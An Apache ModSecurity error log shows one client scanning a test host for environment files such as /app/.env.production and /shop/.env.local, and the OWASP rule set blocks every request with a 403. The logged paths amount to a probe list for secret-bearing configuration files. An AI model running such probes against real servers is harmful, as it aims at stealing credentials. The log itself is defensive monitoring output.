[Thu Jan 08 21:17:40.759920 2026] [:error] [pid 1270039] [client 18.119.100.98:48726] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "aWAQ5JccQYhM1DUhi_W7CAAAAAQ"]
[Thu Jan 08 21:17:40.760073 2026] [:error] [pid 1270039] [client 18.119.100.98:48726] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "aWAQ5JccQYhM1DUhi_W7CAAAAAQ"]
[Thu Jan 08 21:17:41.108518 2026] [:error] [pid 1270043] [client 18.119.100.98:48848] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aWAQ5QvEr1EpOYnVfM6rwwAAAAc"]
[Thu Jan 08 21:17:41.108742 2026] [:error] [pid 1270043] [client 18.119.100.98:48848] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aWAQ5QvEr1EpOYnVfM6rwwAAAAc"]
[Thu Jan 08 21:17:41.108907 2026] [:error] [pid 1270043] [client 18.119.100.98:48848] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aWAQ5QvEr1EpOYnVfM6rwwAAAAc"]
[Thu Jan 08 21:17:41.454260 2026] [:error] [pid 1270035] [client 18.119.100.98:48962] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.staging"] [unique_id "aWAQ5SYqm_i2BUcmtQb4uAAAAAA"]
[Thu Jan 08 21:17:41.454523 2026] [:error] [pid 1270035] [client 18.119.100.98:48962] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.staging"] [unique_id "aWAQ5SYqm_i2BUcmtQb4uAAAAAA"]
[Thu Jan 08 21:17:41.454687 2026] [:error] [pid 1270035] [client 18.119.100.98:48962] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.staging"] [unique_id "aWAQ5SYqm_i2BUcmtQb4uAAAAAA"]
[Thu Jan 08 21:17:41.802948 2026] [:error] [pid 1270041] [client 18.119.100.98:49090] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.production"] [unique_id "aWAQ5c3GwEx_BV8-CrWURAAAAAU"]
[Thu Jan 08 21:17:41.803166 2026] [:error] [pid 1270041] [client 18.119.100.98:49090] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.production"] [unique_id "aWAQ5c3GwEx_BV8-CrWURAAAAAU"]
[Thu Jan 08 21:17:41.803334 2026] [:error] [pid 1270041] [client 18.119.100.98:49090] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env.production"] [unique_id "aWAQ5c3GwEx_BV8-CrWURAAAAAU"]
[Thu Jan 08 21:17:42.158112 2026] [:error] [pid 1270042] [client 18.119.100.98:49198] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stg/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.staging"] [unique_id "aWAQ5i7RlX2cRjHcFz6xwAAAAAY"]
[Thu Jan 08 21:17:42.158320 2026] [:error] [pid 1270042] [client 18.119.100.98:49198] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.staging"] [unique_id "aWAQ5i7RlX2cRjHcFz6xwAAAAAY"]
[Thu Jan 08 21:17:42.158516 2026] [:error] [pid 1270042] [client 18.119.100.98:49198] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env.staging"] [unique_id "aWAQ5i7RlX2cRjHcFz6xwAAAAAY"]
[Thu Jan 08 21:17:42.507377 2026] [:error] [pid 1283304] [client 18.119.100.98:49340] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.local"] [unique_id "aWAQ5mAwUIZgFNkik8yVOwAAAAg"]
[Thu Jan 08 21:17:42.507597 2026] [:error] [pid 1283304] [client 18.119.100.98:49340] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.local"] [unique_id "aWAQ5mAwUIZgFNkik8yVOwAAAAg"]
[Thu Jan 08 21:17:42.507750 2026] [:error] [pid 1283304] [client 18.119.100.98:49340] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.local"] [unique_id "aWAQ5mAwUIZgFNkik8yVOwAAAAg"]
[Thu Jan 08 21:17:42.851131 2026] [:error] [pid 1270036] [client 18.119.100.98:49474] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.staging"] [unique_id "aWAQ5uM1154Q6b0hewij5AAAAAE"]
[Thu Jan 08 21:17:42.851338 2026] [:error] [pid 1270036] [client 18.119.100.98:49474] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.staging"] [unique_id "aWAQ5uM1154Q6b0hewij5AAAAAE"]
[Thu Jan 08 21:17:42.851494 2026] [:error] [pid 1270036] [client 18.119.100.98:49474] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env.staging"] [unique_id "aWAQ5uM1154Q6b0hewij5AAAAAE"]
[Thu Jan 08 21:17:43.194958 2026] [:error] [pid 1270037] [client 18.119.100.98:49596] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nodeweb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nodeweb/.env"] [unique_id "aWAQ5-A_IfWyU2EIiRhOhAAAAAI"]
[Thu Jan 08 21:17:43.195168 2026] [:error] [pid 1270037] [client 18.119.100.98:49596] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nodeweb/.env"] [unique_id "aWAQ5-A_IfWyU2EIiRhOhAAAAAI"]
[Thu Jan 08 21:17:43.195329 2026] [:error] [pid 1270037] [client 18.119.100.98:49596] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nodeweb/.env"] [unique_id "aWAQ5-A_IfWyU2EIiRhOhAAAAAI"]
[Thu Jan 08 21:17:43.545361 2026] [:error] [pid 1280390] [client 18.119.100.98:49724] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.staging"] [unique_id "aWAQ59KTJIy7S9W5nL2LPwAAAAk"]
[Thu Jan 08 21:17:43.545576 2026] [:error] [pid 1280390] [client 18.119.100.98:49724] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.staging"] [unique_id "aWAQ59KTJIy7S9W5nL2LPwAAAAk"]
[Thu Jan 08 21:17:43.545753 2026] [:error] [pid 1280390] [client 18.119.100.98:49724] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.staging"] [unique_id "aWAQ59KTJIy7S9W5nL2LPwAAAAk"]
[Thu Jan 08 21:17:43.892507 2026] [:error] [pid 1270038] [client 18.119.100.98:49854] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample.php"] [unique_id "aWAQ5xmwMJtANIcuNUXpJAAAAAM"]
[Thu Jan 08 21:17:43.892711 2026] [:error] [pid 1270038] [client 18.119.100.98:49854] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample.php"] [unique_id "aWAQ5xmwMJtANIcuNUXpJAAAAAM"]
[Thu Jan 08 21:17:43.892881 2026] [:error] [pid 1270038] [client 18.119.100.98:49854] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.sample.php"] [unique_id "aWAQ5xmwMJtANIcuNUXpJAAAAAM"]
[Thu Jan 08 21:17:44.241283 2026] [:error] [pid 1270039] [client 18.119.100.98:49978] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.staging"] [unique_id "aWAQ6JccQYhM1DUhi_W7CQAAAAQ"]
[Thu Jan 08 21:17:44.241555 2026] [:error] [pid 1270039] [client 18.119.100.98:49978] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.staging"] [unique_id "aWAQ6JccQYhM1DUhi_W7CQAAAAQ"]
[Thu Jan 08 21:17:44.242480 2026] [:error] [pid 1270039] [client 18.119.100.98:49978] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env.staging"] [unique_id "aWAQ6JccQYhM1DUhi_W7CQAAAAQ"]
[Thu Jan 08 21:17:44.585860 2026] [:error] [pid 1270043] [client 18.119.100.98:50108] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.production"] [unique_id "aWAQ6AvEr1EpOYnVfM6rxAAAAAc"]
[Thu Jan 08 21:17:44.586083 2026] [:error] [pid 1270043] [client 18.119.100.98:50108] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.production"] [unique_id "aWAQ6AvEr1EpOYnVfM6rxAAAAAc"]
[Thu Jan 08 21:17:44.586242 2026] [:error] [pid 1270043] [client 18.119.100.98:50108] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/shop/.env.production"] [unique_id "aWAQ6AvEr1EpOYnVfM6rxAAAAAc"]
[Thu Jan 08 21:17:44.931015 2026] [:error] [pid 1270035] [client 18.119.100.98:50238] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /back/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/BACK/.env"] [unique_id "aWAQ6CYqm_i2BUcmtQb4uQAAAAA"]
[Thu Jan 08 21:17:44.931219 2026] [:error] [pid 1270035] [client 18.119.100.98:50238] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/BACK/.env"] [unique_id "aWAQ6CYqm_i2BUcmtQb4uQAAAAA"]
[Thu Jan 08 21:17:44.931445 2026] [:error] [pid 1270035] [client 18.119.100.98:50238] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/BACK/.env"] [unique_id "aWAQ6CYqm_i2BUcmtQb4uQAAAAA"]
[Thu Jan 08 21:17:45.278937 2026] [:error] [pid 1270041] [client 18.119.100.98:50372] [client 18.119.100.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.production"] [unique_id "aWAQ6c3GwEx_BV8-CrWURQAAAAU"]
[Thu Jan 08 21:17:45.279150 2026] [:error] [pid 1270041] [client 18.119.100.98:50372] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/demo/.env.production"] [unique_id "aWAQ6c3GwEx_BV8-CrWURQAAAAU"]
